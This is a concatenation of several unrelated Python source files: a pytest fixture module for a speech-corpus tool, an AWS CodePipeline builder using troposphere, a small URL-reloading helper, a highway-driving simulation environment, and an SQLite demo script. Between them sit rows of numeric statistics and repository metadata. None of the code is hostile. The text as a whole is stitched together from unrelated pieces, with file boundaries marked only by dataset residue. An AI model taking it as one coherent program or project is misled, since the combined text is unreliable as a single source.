config = {'graph_http_port': 7474, 'graph_bolt_port': 7687,
'acoustic_http_port': 8086}
config['host'] = 'localhost'
return config
@pytest.fixture(scope='session')
def untimed_config(graph_db, corpus_data_untimed):
config = CorpusConfig('untimed', **graph_db)
with CorpusContext(config) as c:
c.reset()
c.add_types(*corpus_data_untimed.types('untimed'))
c.initialize_import(corpus_data_untimed.speakers,
corpus_data_untimed.token_headers,
corpus_data_untimed.hierarchy.subannotations)
c.add_discourse(corpus_data_untimed)
c.finalize_import(corpus_data_untimed)
return config
@pytest.fixture(scope='session')
def timed_config(graph_db, corpus_data_timed):
config = CorpusConfig('timed', **graph_db)
with CorpusContext(config) as c:
c.reset()
c.add_types(*corpus_data_timed.types('timed'))
c.initialize_import(corpus_data_timed.speakers,
corpus_data_timed.token_headers,
corpus_data_timed.hierarchy.subannotations)
c.add_discourse(corpus_data_timed)
c.finalize_import(corpus_data_timed)
return config
@pytest.fixture(scope='session')
def syllable_morpheme_config(graph_db, corpus_data_syllable_morpheme_srur):
config = CorpusConfig('syllable_morpheme', **graph_db)
with CorpusContext(config) as c:
c.reset()
c.add_types(*corpus_data_syllable_morpheme_srur.types('syllable_morpheme'))
c.initialize_import(corpus_data_syllable_morpheme_srur.speakers,
corpus_data_syllable_morpheme_srur.token_headers,
corpus_data_syllable_morpheme_srur.hierarchy.subannotations)
c.add_discourse(corpus_data_syllable_morpheme_srur)
c.finalize_import(corpus_data_syllable_morpheme_srur)
return config
@pytest.fixture(scope='session')
def ursr_config(graph_db, corpus_data_ur_sr):
config = CorpusConfig('ur_sr', **graph_db)
with CorpusContext(config) as c:
c.reset()
c.add_types(*corpus_data_ur_sr.types('ur_sr'))
c.initialize_import(corpus_data_ur_sr.speakers,
corpus_data_ur_sr.token_headers,
corpus_data_ur_sr.hierarchy.subannotations)
c.add_discourse(corpus_data_ur_sr)
c.finalize_import(corpus_data_ur_sr)
return config
@pytest.fixture(scope='session')
def subannotation_config(graph_db, subannotation_data):
config = CorpusConfig('subannotations', **graph_db)
with CorpusContext(config) as c:
c.reset()
c.add_types(*subannotation_data.types('subannotations'))
c.initialize_import(subannotation_data.speakers,
subannotation_data.token_headers,
subannotation_data.hierarchy.subannotations)
c.add_discourse(subannotation_data)
c.finalize_import(subannotation_data)
return config
@pytest.fixture(scope='session')
def lexicon_test_data():
data = {'cats': {'POS': 'NNS'}, 'are': {'POS': 'VB'}, 'cute': {'POS': 'JJ'},
'dogs': {'POS': 'NNS'}, 'too': {'POS': 'IN'}, 'i': {'POS': 'PRP'},
'guess': {'POS': 'VB'}}
return data
@pytest.fixture(scope='session')
def acoustic_config(graph_db, textgrid_test_dir):
config = CorpusConfig('acoustic', **graph_db)
acoustic_path = os.path.join(textgrid_test_dir, 'acoustic_corpus.TextGrid')
with CorpusContext(config) as c:
c.reset()
parser = inspect_textgrid(acoustic_path)
c.load(parser, acoustic_path)
config.pitch_algorithm = 'acousticsim'
config.formant_source = 'acousticsim'
return config
@pytest.fixture(scope='session')
def acoustic_syllabics():
return ['ae', 'aa', 'uw', 'ay', 'eh', 'ih', 'aw', 'ey', 'iy',
'uh', 'ah', 'ao', 'er', 'ow']
@pytest.fixture(scope='session')
def acoustic_utt_config(graph_db, textgrid_test_dir, acoustic_syllabics):
config = CorpusConfig('acoustic_utt', **graph_db)
acoustic_path = os.path.join(textgrid_test_dir, 'acoustic_corpus.TextGrid')
with CorpusContext(config) as c:
c.reset()
parser = inspect_textgrid(acoustic_path)
c.load(parser, acoustic_path)
c.encode_pauses(['sil'])
c.encode_utterances(min_pause_length=0)
c.encode_syllabic_segments(acoustic_syllabics)
c.encode_syllables()
config.pitch_algorithm = 'acousticsim'
config.formant_source = 'acousticsim'
return config
@pytest.fixture(scope='session')
def overlapped_config(graph_db, textgrid_test_dir, acoustic_syllabics):
config = CorpusConfig('overlapped', **graph_db)
acoustic_path = os.path.join(textgrid_test_dir, 'overlapped_speech')
with CorpusContext(config) as c:
c.reset()
parser = inspect_mfa(acoustic_path)
c.load(parser, acoustic_path)
c.encode_pauses(['sil'])
c.encode_utterances(min_pause_length=0)
c.encode_syllabic_segments(acoustic_syllabics)
c.encode_syllables()
config.pitch_algorithm = 'acousticsim'
config.formant_source = 'acousticsim'
return config
@pytest.fixture(scope='session')
def french_config(graph_db, textgrid_test_dir):
config = CorpusConfig('french', **graph_db)
french_path = os.path.join(textgrid_test_dir, 'FR001_5.TextGrid')
with CorpusContext(config) as c:
c.reset()
parser = inspect_textgrid(french_path)
c.load(parser, french_path)
c.encode_pauses(['sil', '<SIL>'])
c.encode_utterances(min_pause_length=.15)
return config
@pytest.fixture(scope='session')
def fave_corpus_config(graph_db, fave_test_dir):
config = CorpusConfig('fave_test_corpus', **graph_db)
with CorpusContext(config) as c:
c.reset()
parser = inspect_fave(fave_test_dir)
c.load(parser, fave_test_dir)
return config
@pytest.fixture(scope='session')
def summarized_config(graph_db, textgrid_test_dir):
config = CorpusConfig('summarized', **graph_db)
acoustic_path = os.path.join(textgrid_test_dir, 'acoustic_corpus.TextGrid')
with CorpusContext(config) as c:
c.reset()
parser = inspect_textgrid(acoustic_path)
c.load(parser, acoustic_path)
return config
@pytest.fixture(scope='session')
def stressed_config(graph_db, textgrid_test_dir):
config = CorpusConfig('stressed', **graph_db)
stressed_path = os.path.join(textgrid_test_dir, 'stressed_corpus.TextGrid')
with CorpusContext(config) as c:
c.reset()
parser = inspect_mfa(stressed_path)
c.load(parser, stressed_path)
return config
@pytest.fixture(scope='session')
def partitur_corpus_config(graph_db, partitur_test_dir):
config = CorpusConfig('partitur', **graph_db)
partitur_path = os.path.join(partitur_test_dir, 'partitur_test.par,2')
with CorpusContext(config) as c:
c.reset()
parser = inspect_partitur(partitur_path)
c.load(parser, partitur_path)
return config
@pytest.fixture(scope='session')
def praat_path():
if sys.platform == 'win32':
return 'praatcon.exe'
elif os.environ.get('TRAVIS', False):
return os.path.join(os.environ.get('HOME'), 'tools', 'praat')
else:
return 'praat'
@pytest.fixture(scope='session')
def reaper_path():
if os.environ.get('TRAVIS', False):
return os.path.join(os.environ.get('HOME'), 'tools', 'reaper')
else:
return 'reaper'
@pytest.fixture(scope='session')
def vot_classifier_path(test_dir):
return os.path.join(test_dir, 'classifier', 'sotc_classifiers', 'sotc_voiceless.classifier')
@pytest.fixture(scope='session')
def localhost():
return 'http://localhost:8080'
@pytest.fixture(scope='session')
def stress_pattern_file(test_dir):
return os.path.join(test_dir, 'lexicons', 'stress_pattern_lex.txt')
@pytest.fixture(scope='session')
def timed_lexicon_enrich_file(test_dir):
return os.path.join(test_dir, 'csv', 'timed_enrichment.txt')
@pytest.fixture(scope='session')
def acoustic_speaker_enrich_file(test_dir):
return os.path.join(test_dir, 'csv', 'acoustic_speaker_enrichment.txt')
@pytest.fixture(scope='session')
def acoustic_discourse_enrich_file(test_dir):
return os.path.join(test_dir, 'csv', 'acoustic_discourse_enrichment.txt')
@pytest.fixture(scope='session')
def acoustic_inventory_enrich_file(test_dir):
return os.path.join(test_dir, 'features', 'basic.txt') | 35.815929 | 113 | 0.588308 | 2,781 | 20,236 | 4.121899 | 0.102481 | 0.049463 | 0.078513 | 0.109047 | 0.622612 | 0.522987 | 0.492192 | 0.404083 | 0.352787 | 0.327576 | 0 | 0.043194 | 0.220893 | 20,236 | 565 | 114 | 35.815929 | 0.683877 | 0.000692 | 0 | 0.410959 | 0 | 0 | 0.140399 | 0.013501 | 0 | 0 | 0 | 0 | 0 | 1 | 0.116438 | false | 0 | 0.043379 | 0.052511 | 0.280822 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9d8f74d2d05d2035a3088b326a56139ee5b3ff4 | 10,285 | py | Python | cumulus/steps/dev_tools/pipeline.py | john-shaskin/cumulus | 4687d83ab324e57d900d9888da62e2fb7f4505e9 | [
"MIT"
] | null | null | null | cumulus/steps/dev_tools/pipeline.py | john-shaskin/cumulus | 4687d83ab324e57d900d9888da62e2fb7f4505e9 | [
"MIT"
] | 11 | 2018-09-10T22:57:31.000Z | 2019-02-28T17:21:24.000Z | cumulus/steps/dev_tools/pipeline.py | john-shaskin/cumulus | 4687d83ab324e57d900d9888da62e2fb7f4505e9 | [
"MIT"
] | 3 | 2018-09-05T20:33:35.000Z | 2018-10-17T16:01:26.000Z |
import awacs
import awacs.aws
import awacs.awslambda
import awacs.codecommit
import awacs.ec2
import awacs.iam
import awacs.logs
import awacs.s3
import awacs.sts
import awacs.kms
import troposphere
from troposphere import codepipeline, Ref, iam
from troposphere.s3 import Bucket, VersioningConfiguration
import cumulus.steps.dev_tools
from cumulus.chain import step
class Pipeline(step.Step):
def __init__(self,
name,
bucket_name,
pipeline_service_role_arn=None,
create_bucket=True,
pipeline_policies=None,
bucket_policy_statements=None,
bucket_kms_key_arn=None,
):
"""
:type pipeline_service_role_arn: basestring Override the pipeline service role. If you pass this
the pipeline_policies is not used.
:type create_bucket: bool if False, will not create the bucket. Will attach policies either way.
:type bucket_name: the name of the bucket that will be created suffixed with the chaincontext instance name
:type bucket_policy_statements: [awacs.aws.Statement]
:type pipeline_policies: [troposphere.iam.Policy]
:type bucket_kms_key_arn: ARN used to decrypt the pipeline artifacts
"""
step.Step.__init__(self)
self.name = name
self.bucket_name = bucket_name
self.create_bucket = create_bucket
self.pipeline_service_role_arn = pipeline_service_role_arn
self.bucket_policy_statements = bucket_policy_statements
self.pipeline_policies = pipeline_policies or []
self.bucket_kms_key_arn = bucket_kms_key_arn
def handle(self, chain_context):
"""
This step adds in the shell of a pipeline.
* s3 bucket
* policies for the bucket and pipeline
* your next step in the chain MUST be a source stage
:param chain_context:
:return:
"""
if self.create_bucket:
pipeline_bucket = Bucket(
"PipelineBucket%s" % self.name,
BucketName=self.bucket_name,
VersioningConfiguration=VersioningConfiguration(
Status="Enabled"
)
)
chain_context.template.add_resource(pipeline_bucket)
default_bucket_policies = self.get_default_bucket_policy_statements(self.bucket_name)
if self.bucket_policy_statements:
bucket_access_policy = self.get_bucket_policy(
pipeline_bucket=self.bucket_name,
bucket_policy_statements=self.bucket_policy_statements,
)
chain_context.template.add_resource(bucket_access_policy)
pipeline_bucket_access_policy = iam.ManagedPolicy(
"PipelineBucketAccessPolicy",
Path='/managed/',
PolicyDocument=awacs.aws.PolicyDocument(
Version="2012-10-17",
Id="bucket-access-policy%s" % chain_context.instance_name,
Statement=default_bucket_policies
)
)
chain_context.metadata[cumulus.steps.dev_tools.META_PIPELINE_BUCKET_NAME] = self.bucket_name
chain_context.metadata[cumulus.steps.dev_tools.META_PIPELINE_BUCKET_POLICY_REF] = Ref(
pipeline_bucket_access_policy)
default_pipeline_role = self.get_default_pipeline_role()
pipeline_service_role_arn = self.pipeline_service_role_arn or troposphere.GetAtt(default_pipeline_role, "Arn")
generic_pipeline = codepipeline.Pipeline(
"Pipeline",
RoleArn=pipeline_service_role_arn,
Stages=[],
ArtifactStore=codepipeline.ArtifactStore(
Type="S3",
Location=self.bucket_name,
)
)
if self.bucket_kms_key_arn:
encryption_config = codepipeline.EncryptionKey(
"ArtifactBucketKmsKey",
Id=self.bucket_kms_key_arn,
Type='KMS',
)
generic_pipeline.ArtifactStore.EncryptionKey = encryption_config
pipeline_output = troposphere.Output(
"PipelineName",
Description="Code Pipeline",
Value=Ref(generic_pipeline),
)
pipeline_bucket_output = troposphere.Output(
"PipelineBucket",
Description="Name of the input artifact bucket for the pipeline",
Value=self.bucket_name,
)
if not self.pipeline_service_role_arn:
chain_context.template.add_resource(default_pipeline_role)
chain_context.template.add_resource(pipeline_bucket_access_policy)
chain_context.template.add_resource(generic_pipeline)
chain_context.template.add_output(pipeline_output)
chain_context.template.add_output(pipeline_bucket_output)
def get_default_pipeline_role(self):
# TODO: this can be cleaned up by using a policytype and passing in the pipeline role it should add itself to.
pipeline_policy = iam.Policy(
PolicyName="%sPolicy" % self.name,
PolicyDocument=awacs.aws.PolicyDocument(
Version="2012-10-17",
Id="PipelinePolicy",
Statement=[
awacs.aws.Statement(
Effect=awacs.aws.Allow,
# TODO: actions here could be limited more
Action=[awacs.aws.Action("s3", "*")],
Resource=[
troposphere.Join('', [
awacs.s3.ARN(),
self.bucket_name,
"/*"
]),
troposphere.Join('', [
awacs.s3.ARN(),
self.bucket_name,
]),
],
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[awacs.aws.Action("kms", "*")],
Resource=['*'],
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.aws.Action("cloudformation", "*"),
awacs.aws.Action("codebuild", "*"),
],
# TODO: restrict more accurately
Resource=["*"]
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.codecommit.GetBranch,
awacs.codecommit.GetCommit,
awacs.codecommit.UploadArchive,
awacs.codecommit.GetUploadArchiveStatus,
awacs.codecommit.CancelUploadArchive
],
Resource=["*"]
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.iam.PassRole
],
Resource=["*"]
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.aws.Action("lambda", "*")
],
Resource=["*"]
),
],
)
)
pipeline_service_role = iam.Role(
"PipelineServiceRole",
Path="/",
AssumeRolePolicyDocument=awacs.aws.Policy(
Statement=[
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[awacs.sts.AssumeRole],
Principal=awacs.aws.Principal(
'Service',
"codepipeline.amazonaws.com"
)
)]
),
Policies=[pipeline_policy] + self.pipeline_policies
)
return pipeline_service_role
def get_default_bucket_policy_statements(self, pipeline_bucket):
bucket_policy_statements = [
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.s3.ListBucket,
awacs.s3.GetBucketVersioning,
],
Resource=[
troposphere.Join('', [
awacs.s3.ARN(),
pipeline_bucket,
]),
],
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.s3.HeadBucket,
],
Resource=[
'*'
]
),
awacs.aws.Statement(
Effect=awacs.aws.Allow,
Action=[
awacs.s3.GetObject,
awacs.s3.GetObjectVersion,
awacs.s3.PutObject,
awacs.s3.ListObjects,
awacs.s3.ListBucketMultipartUploads,
awacs.s3.AbortMultipartUpload,
awacs.s3.ListMultipartUploadParts,
awacs.aws.Action("s3", "Get*"),
],
Resource=[
troposphere.Join('', [
awacs.s3.ARN(),
pipeline_bucket,
'/*'
]),
],
)
]
return bucket_policy_statements
def get_bucket_policy(self, pipeline_bucket, bucket_policy_statements):
policy = troposphere.s3.BucketPolicy(
"PipelineBucketPolicy",
Bucket=pipeline_bucket,
PolicyDocument=awacs.aws.Policy(
Statement=bucket_policy_statements,
),
)
return policy
| 37.673993 | 118 | 0.50841 | 852 | 10,285 | 5.911972 | 0.206573 | 0.052412 | 0.05678 | 0.045662 | 0.342863 | 0.268215 | 0.205281 | 0.187413 | 0.142545 | 0.11217 | 0 | 0.006331 | 0.416432 | 10,285 | 272 | 119 | 37.8125 | 0.832889 | 0.089159 | 0 | 0.337662 | 0 | 0 | 0.040633 | 0.008018 | 0 | 0 | 0 | 0.003676 | 0 | 1 | 0.021645 | false | 0.004329 | 0.064935 | 0 | 0.103896 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9da06c2dab9036fffee0adcf12fef779efeb4ab | 308 | py | Python | sitetest/core/sandbox.py | ninapavlich/sitetest | 2f5942c5280e5e7516e28be669013ee74bf03da3 | [
"Apache-2.0"
] | 3 | 2017-10-17T13:44:51.000Z | 2018-11-17T15:43:08.000Z | sitetest/core/sandbox.py | ninapavlich/sitetest | 2f5942c5280e5e7516e28be669013ee74bf03da3 | [
"Apache-2.0"
] | 20 | 2015-01-06T21:06:14.000Z | 2021-12-13T19:58:56.000Z | sitetest/core/sandbox.py | ninapavlich/sitetest | 2f5942c5280e5e7516e28be669013ee74bf03da3 | [
"Apache-2.0"
] | null | null | null | import logging
import urllib2
logger = logging.getLogger('sitetest')
def reload_url(url, user_agent_string):
request = urllib2.Request(url)
request.add_header('User-agent', user_agent_string)
response = urllib2.urlopen(request)
logger.info("Response: %s: %s" % (response.code, response))
| 23.692308 | 63 | 0.730519 | 39 | 308 | 5.615385 | 0.512821 | 0.123288 | 0.136986 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011364 | 0.142857 | 308 | 12 | 64 | 25.666667 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0.11039 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.25 | 0 | 0.375 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9de78e19fbd2362a60c1cdeb5bc9c8ec641c068 | 12,366 | py | Python | highway_env/envs/merge_out.py | jasonplato/High_SimulationPlatform | 8a0ed628ed824d08150ceff13487194212e95693 | [
"MIT"
] | null | null | null | highway_env/envs/merge_out.py | jasonplato/High_SimulationPlatform | 8a0ed628ed824d08150ceff13487194212e95693 | [
"MIT"
] | 1 | 2020-03-19T08:50:34.000Z | 2020-03-19T08:50:34.000Z | highway_env/envs/merge_out.py | jasonplato/Highway_SimulationPlatform | 8a0ed628ed824d08150ceff13487194212e95693 | [
"MIT"
] | null | null | null | from __future__ import division, print_function, absolute_import
import numpy as np
from highway_env import utils
from highway_env.envs.abstract import AbstractEnv
from highway_env.road.lane import LineType, StraightLane, SineLane, LanesConcatenation
from highway_env.road.road import Road, RoadNetwork
from highway_env.vehicle.control import ControlledVehicle, MDPVehicle, CarSim, FreeControl
from highway_env.vehicle.behavior import IDMVehicle
from highway_env.vehicle.dynamics import RedLight
import time
import random
class MergeEnvOut(AbstractEnv):
"""
A highway merge negotiation environment.
The ego-vehicle is driving on a highway and approached a merge, with some vehicles incoming on the access ramp.
It is rewarded for maintaining a high velocity and avoiding collisions, but also making room for merging
vehicles.
"""
COLLISION_REWARD = -1
RIGHT_LANE_REWARD = 0.1
HIGH_VELOCITY_REWARD = 0.2
MERGING_VELOCITY_REWARD = -0.5
LANE_CHANGE_REWARD = -0.05
DEFAULT_CONFIG = {"other_vehicles_type": "highway_env.vehicle.behavior.IDMVehicle",
"incoming_vehicle_destination": None,
"other_vehicles_destination": None}
def __init__(self):
super(MergeEnvOut, self).__init__()
self.config = self.DEFAULT_CONFIG.copy()
self.steps = 0
# self.make_road()
# self.reset()
# self.double_merge()
# self.make_vehicles()
def configure(self, config):
self.config.update(config)
def _observation(self):
return super(MergeEnvOut, self)._observation()
def _reward(self, action):
"""
The vehicle is rewarded for driving with high velocity on lanes to the right and avoiding collisions, but
an additional altruistic penalty is also suffered if any vehicle on the merging lane has a low velocity.
:param action: the action performed
:return: the reward of the state-action transition
"""
action_reward = {0: self.LANE_CHANGE_REWARD,
1: 0,
2: self.LANE_CHANGE_REWARD,
3: 0,
4: 0}
reward = self.COLLISION_REWARD * self.vehicle.crashed \
+ self.RIGHT_LANE_REWARD * self.vehicle.lane_index / (len(self.road.lanes) - 2) \
+ self.HIGH_VELOCITY_REWARD * self.vehicle.velocity_index / (self.vehicle.SPEED_COUNT - 1)
# Altruistic penalty
for vehicle in self.road.vehicles:
if vehicle.lane_index == len(self.road.lanes) - 1 and isinstance(vehicle, ControlledVehicle):
reward += self.MERGING_VELOCITY_REWARD * \
(vehicle.target_velocity - vehicle.velocity) / vehicle.target_velocity
return reward + action_reward[action]
def _is_terminal(self):
"""
The episode is over when a collision occurs or when the access ramp has been passed.
"""
return self.vehicle.crashed or self.vehicle.position[0] > 300
def reset(self):
# self.make_road()
print("enter reset")
self.make_roads()
self.make_vehicles()
return self._observation()
def make_roads(self):
net = RoadNetwork()
n, c, s = LineType.NONE, LineType.CONTINUOUS, LineType.STRIPED
net.add_lane("s1", "inter1", StraightLane(np.array([0, 0]), np.array([100, 0]), line_types=[c, s]))
net.add_lane("inter1", "inter2", StraightLane(np.array([100, 0]), np.array([150, 0]), line_types=[c, s]))
net.add_lane("inter2", "inter3", StraightLane(np.array([150, 0]), np.array([200, 0]), line_types=[c, s]))
net.add_lane("inter3", "x1", StraightLane(np.array([200, 0]), np.array([300, 0]), line_types=[c, s]))
net.add_lane("s1", "inter1", StraightLane(np.array([0, 4]), np.array([100, 4]), line_types=[s, s]))
net.add_lane("inter1", "inter2", StraightLane(np.array([100, 4]), np.array([150, 4]), line_types=[s, s]))
net.add_lane("inter2", "inter3", StraightLane(np.array([150, 4]), np.array([200, 4]), line_types=[s, s]))
net.add_lane("inter3", "x1", StraightLane(np.array([200, 4]), np.array([300, 4]), line_types=[s, s]))
net.add_lane("s1", "inter1", StraightLane(np.array([0, 8]), np.array([100, 8]), line_types=[s, s]))
net.add_lane("inter1", "inter2", StraightLane(np.array([100, 8]), np.array([150, 8]), line_types=[s, s]))
net.add_lane("inter2", "inter3", StraightLane(np.array([150, 8]), np.array([200, 8]), line_types=[s, c]))
net.add_lane("inter3", "x1", StraightLane(np.array([200, 8]), np.array([300, 8]), line_types=[s, c]))
amplitude = 4.5
net.add_lane("s1", "inter1", StraightLane(np.array([0, 12]), np.array([100, 12]), line_types=[s, c]))
net.add_lane("inter1", "inter2", StraightLane(np.array([100, 12]), np.array([150, 12]), line_types=[s, c]))
net.add_lane("inter2", "ee", StraightLane(np.array([150, 12]), np.array([200, 12]), line_types=[s, c],forbidden=True))
net.add_lane("ee", "ex",
SineLane(np.array([200, 12 + amplitude]), np.array([250, 12 + amplitude]), -amplitude,
2 * np.pi / (2 * 50), np.pi / 2, line_types=[c, c], forbidden=True))
net.add_lane("ex", "x2",
StraightLane(np.array([250, 17 + amplitude]), np.array([300, 17 + amplitude]), line_types=[c, c],
forbidden=True))
road = Road(network=net, np_random=self.np_random)
# road.vehicles.append(RedLight(road, [150, 0]))
# road.vehicles.append(RedLight(road, [150, 4]))
# road.vehicles.append(RedLight(road, [150, 8]))
self.road = road
def make_vehicles(self):
"""
Populate a road with several vehicles on the highway and on the merging lane, as well as an ego-vehicle.
:return: the ego-vehicle
"""
max_l = 300
road = self.road
other_vehicles_type = utils.class_from_path(self.config["other_vehicles_type"])
car_number_each_lane = 2
# reset_position_range = (30, 40)
# reset_lane = random.choice(road.lanes)
reset_lane = ("s1", "inter1", 1)
ego_vehicle = None
birth_place = [("s1", "inter1", 0), ("s1", "inter1", 1), ("s1", "inter1", 2), ("s1", "inter1", 3)]
destinations = ["x1", "x2"]
position_deviation = 10
velocity_deviation = 2
# print("graph:", self.road.network.graph, "\n")
for l in self.road.network.LANES:
lane = road.network.get_lane(l)
cars_on_lane = car_number_each_lane
reset_position = None
if l == reset_lane:
# print("enter l==reset_lane")
cars_on_lane += 1
reset_position = random.choice(range(1, car_number_each_lane))
# reset_position = 2
for i in range(cars_on_lane):
if i == reset_position and not ego_vehicle:
ego_lane = self.road.network.get_lane(("s1", "inter1", 1))
ego_vehicle = IDMVehicle(self.road,
ego_lane.position(0, 1),
velocity=10,
heading=ego_lane.heading_at(0)).plan_route_to("x2")
# print("ego_route:", ego_vehicle.route, "\n")
# print("ego_relative_offset:",ego_vehicle.lane.local_coordinates(ego_vehicle.position)[1])
ego_vehicle.id = 0
road.vehicles.append(ego_vehicle)
self.vehicle = ego_vehicle
else:
car = other_vehicles_type.make_on_lane(road, birth_place[np.random.randint(0, 4)],
longitudinal=5 + np.random.randint(1,
10) * position_deviation,
velocity=5 + np.random.randint(1, 5) * velocity_deviation)
if self.config["other_vehicles_destination"] is not None:
destination = destinations[self.config["other_vehicles_destination"]]
else:
destination = destinations[np.random.randint(0, 2)]
# print("destination:",destination)
car.plan_route_to(destination)
car.randomize_behavior()
road.vehicles.append(car)
lane.vehicles.append(car)
# road.vehicles.append(
# other_vehicles_type(road, l.position((i + 1) * np.random.randint(*reset_position_range), 0),
# velocity=np.random.randint(18, 25), dst=3, max_length=max_l))
# for l in road.lanes[3:]:
# cars_on_lane = car_number_each_lane
# reset_position = None
# if l is reset_lane:
# cars_on_lane+=1
# reset_position = random.choice(range(1,car_number_each_lane))
# for i in range(cars_on_lane):
# if i == reset_position:
# ego_vehicle = ControlledVehicle(road, l.position((i+1) * np.random.randint(*reset_position_range), 0), velocity=20,max_length=max_l)
# road.vehicles.append(ego_vehicle)
# self.vehicle = ego_vehicle
# else:
# road.vehicles.append(other_vehicles_type(road, l.position((i+1) * np.random.randint(*reset_position_range), 0), velocity=np.random.randint(18,25),dst=2,rever=True,max_length=max_l))
for i in range(self.road.network.LANES_NUMBER):
lane = road.network.get_lane(self.road.network.LANES[i])
# print("lane:", lane.LANEINDEX, "\n")
lane.vehicles = sorted(lane.vehicles, key=lambda x: lane.local_coordinates(x.position)[0])
# print("len of lane.vehicles:", len(lane.vehicles), "\n")
for j, v in enumerate(lane.vehicles):
# print("i:",i,"\n")
v.vehicle_index_in_line = j
def fake_step(self):
"""
:return:
"""
for k in range(int(self.SIMULATION_FREQUENCY // self.POLICY_FREQUENCY)):
self.road.act()
self.road.step(1 / self.SIMULATION_FREQUENCY)
# Automatically render intermediate simulation steps if a viewer has been launched
self._automatic_rendering()
# Stop at terminal states
if self.done or self._is_terminal():
break
self.enable_auto_render = False
self.steps += 1
from highway_env.extractors import Extractor
extractor = Extractor()
extractor_features = extractor.FeatureExtractor(self.road.vehicles, 0, 1)
for i in range(2):
birth_place = [("s1", "inter1", 0), ("s1", "inter1", 1), ("s1", "inter1", 2), ("s1", "inter1", 3)]
destinations = ["x1", "x2"]
# position_deviation = 5
velocity_deviation = 1.5
other_vehicles_type = utils.class_from_path(self.config["other_vehicles_type"])
birth = birth_place[np.random.randint(0, 4)]
lane = self.road.network.get_lane(birth)
car = other_vehicles_type.make_on_lane(self.road, birth,
longitudinal=0,
velocity=5 + np.random.randint(1, 10) * velocity_deviation)
if self.config["incoming_vehicle_destination"] is not None:
destination = destinations[self.config["incoming_vehicle_destination"]]
else:
destination = destinations[np.random.randint(0, 2)]
car.plan_route_to(destination)
car.randomize_behavior()
self.road.vehicles.append(car)
lane.vehicles.append(car)
# obs = self._observation()
# reward = self._reward(action)
terminal = self._is_terminal()
info = {}
return terminal,extractor_features
if __name__ == '__main__':
pass
| 49.662651 | 203 | 0.576257 | 1,491 | 12,366 | 4.600268 | 0.165661 | 0.034699 | 0.024785 | 0.016037 | 0.417845 | 0.386499 | 0.33416 | 0.306604 | 0.250328 | 0.210964 | 0 | 0.036853 | 0.300016 | 12,366 | 248 | 204 | 49.862903 | 0.755545 | 0.208071 | 0 | 0.10828 | 0 | 0 | 0.054587 | 0.020979 | 0 | 0 | 0 | 0 | 0 | 1 | 0.057325 | false | 0.006369 | 0.076433 | 0.006369 | 0.210191 | 0.012739 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
a9e2f40ec8188b47714aa6c85a2a8b8fcf7896b9 | 1,285 | py | Python | demo_data.py | lechemrc/DS-Unit-3-Sprint-2-SQL-and-Databases | edab19d5c73af7c6f15eb5dc3f31d2c5fce558fd | [
"MIT"
] | null | null | null | demo_data.py | lechemrc/DS-Unit-3-Sprint-2-SQL-and-Databases | edab19d5c73af7c6f15eb5dc3f31d2c5fce558fd | [
"MIT"
] | null | null | null | demo_data.py | lechemrc/DS-Unit-3-Sprint-2-SQL-and-Databases | edab19d5c73af7c6f15eb5dc3f31d2c5fce558fd | [
"MIT"
] | null | null | null | import sqlite3
sl_conn = sqlite3.connect('demo_data.sqlite3')
sl_cur = sl_conn.cursor()
# Creating table demo
table = """
CREATE TABLE demo(
s VARCHAR (10),
x INT,
y INT
);
"""
sl_cur.execute('DROP TABLE demo')
sl_cur.execute(table)
# Checking for table creation accuracy
sl_cur.execute('PRAGMA table_info(demo);').fetchall()
demo_insert = """
INSERT INTO demo (s, x, y)
VALUES ('g', 3, 9), ('v', 5, 7), ('f', 8, 7);
"""
sl_cur.execute(demo_insert)
sl_cur.close()
sl_conn.commit()
# Testing demo file
sl_conn = sqlite3.connect('demo_data.sqlite3')
sl_cur = sl_conn.cursor()
# Number of rows
sl_cur.execute('SELECT COUNT(*) FROM demo')
result = sl_cur.fetchall()
print(f'There are {result} rows.\n')
# How many rows are there where both x and y are at least 5?
sl_cur.execute("""
SELECT COUNT(*)
FROM demo
WHERE x >= 5
AND y >= 5;
""")
result = sl_cur.fetchall()
print(f'There are {result} rows with values of at least 5.\n')
# How many unique values of y are there?
sl_cur.execute("""
SELECT COUNT(DISTINCT y)
FROM demo
""")
result = sl_cur.fetchall()
print(f"There are {result} unique values of 'y'.")
# Closing connection and committing
